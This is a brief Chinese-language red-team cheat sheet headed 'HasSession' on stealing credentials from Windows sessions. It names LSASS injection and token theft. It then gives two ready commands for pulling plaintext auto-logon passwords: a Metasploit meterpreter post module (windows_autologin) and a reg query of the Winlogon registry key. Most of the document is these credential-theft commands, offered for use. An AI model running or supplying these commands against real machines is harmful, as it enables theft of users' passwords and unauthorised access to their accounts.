HasSession
1. 原理
当用户与计算机进行会话时,凭据会保留在内存中,这些凭据可以通过 LSASS 注入、令牌窃取或进程注入等方式来获取。
如用户把计算机设置自动登录,则可以使用MSF抓取自动登录的用户名和密码
2. 利用方式
2.1. 使用msf模块从注册表中获取明文密码
meterpreter > run post/windows/gather/credentials/windows_autologin
2.2. 直接读取注册表 获取明文密码
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"